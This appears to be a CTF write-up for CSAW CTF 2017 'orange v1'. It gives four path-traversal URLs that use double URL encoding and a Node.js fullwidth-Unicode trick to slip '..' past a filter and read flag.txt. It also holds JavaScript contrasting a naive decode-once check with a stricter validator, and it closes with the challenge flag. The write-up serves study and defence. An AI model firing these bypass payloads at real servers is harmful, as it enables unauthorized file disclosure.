Wednesday, September 20, 2017

CSAW CTF 2017 - orange v1


1. Double URL encoding

%2e%2e → %252e%252e

http://web.chal.csaw.io:7311/?path=%252e%252e/flag.txt
http://web.chal.csaw.io:7311/?path=%252e%2e/flag.txt


2. Node.js Unicode handling trick

%ef%bc%ae == %2e (True)

http://web.chal.csaw.io:7311/?path=%ef%bc%ae%2e/flag.txt
http://web.chal.csaw.io:7311/?path=%ef%bc%ae%252e/flag.txt
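
Why both tricks get past a decode-once filter, and a stricter check that rejects all four path values above. This is an added example, not the challenge's source code: the function names are hypothetical, and the second decode plus latin1 conversion is an assumed model of the layer behind the filter.

```javascript
// Added example, not the challenge's source. All function names are hypothetical.

// Naive filter: decode once, then look for "..".
function naiveIsSafe(raw) {
  return !decodeURIComponent(raw).includes('..');
}

// What a later layer may do to the same value (assumed behaviour): decode
// again, then write the string as latin1, which keeps only the low byte of
// each UTF-16 code unit, so U+FF2E (UTF-8: ef bc ae) becomes 0x2e, ".".
function asSeenDownstream(raw) {
  let s = decodeURIComponent(raw);
  try { s = decodeURIComponent(s); } catch (e) { /* no second layer */ }
  return Buffer.from(s, 'latin1').toString('latin1');
}

// Stricter validator: decode until the value stops changing (bounded),
// accept printable ASCII only, reject backslashes and dot segments.
function strictIsSafe(raw, maxRounds = 5) {
  let s = raw;
  let stable = false;
  for (let i = 0; i < maxRounds && !stable; i++) {
    let next;
    try { next = decodeURIComponent(s); } catch (e) { return false; }
    stable = next === s;
    s = next;
  }
  if (!stable) return false;                       // still changing: refuse
  if (!/^[\x20-\x7e]+$/.test(s) || s.includes('\\')) return false;
  return s.split('/').every((seg) => seg !== '..' && seg !== '.');
}

// The four path values from this page, plus one constructed benign value.
const samples = [
  '%252e%252e/flag.txt',
  '%252e%2e/flag.txt',
  '%ef%bc%ae%2e/flag.txt',
  '%ef%bc%ae%252e/flag.txt',
  'notes/readme.txt', // constructed
];

function report() {
  return samples.map((raw) => ({
    raw,
    naive: naiveIsSafe(raw),
    downstream: asSeenDownstream(raw),
    strict: strictIsSafe(raw),
  }));
}

console.table(report());
```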


flag{thank_you_based_orange_for_this_ctf_challenge}